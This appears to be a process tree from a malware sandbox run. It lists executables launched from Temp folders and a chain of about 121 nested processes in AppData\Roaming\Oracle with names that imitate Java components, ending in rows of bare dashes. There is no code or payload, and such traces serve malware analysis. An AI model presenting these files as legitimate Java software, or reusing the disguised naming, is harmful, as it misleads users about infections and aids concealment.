C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""5⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369530101\5fad65d953.exe"C:\Users\Admin\AppData\Local\Temp\10369530101\5fad65d953.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
-
-
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv GoBgzX/7g0ameg+gN9tl2w.0.21⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exeC:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe"1⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe2⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe4⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe5⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe6⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe7⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe8⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe9⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe10⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe11⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe12⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe13⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe14⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe15⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe16⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe17⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe18⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe19⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe20⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe21⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe22⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe23⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe24⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe25⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe26⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe27⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe28⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe29⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe30⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe31⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe32⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exeC:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe33⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe34⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe35⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe36⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe37⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe38⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe39⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe40⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe41⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe42⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exeC:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe43⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe44⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe45⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe46⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe47⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe48⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe49⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe50⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe51⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exeC:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe52⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe53⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe54⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exeC:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe55⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe56⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe57⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe58⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe59⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe60⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe61⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe62⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe63⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe64⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exeC:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe65⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe66⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe67⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe68⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe69⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe70⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe71⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe72⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe73⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe74⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exeC:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe75⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe76⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe77⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe78⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe79⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe80⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe81⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe82⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe83⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe84⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe85⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe86⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe87⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe88⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe89⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe90⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe91⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe92⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe93⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe94⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe95⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe96⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe97⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe98⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe99⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe100⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe101⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe102⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe103⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe104⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exeC:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe105⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe106⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe107⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exeC:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe108⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe109⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe110⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe111⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe112⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe113⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe114⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe115⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe116⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe117⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe118⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe119⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe120⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe121⤵
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-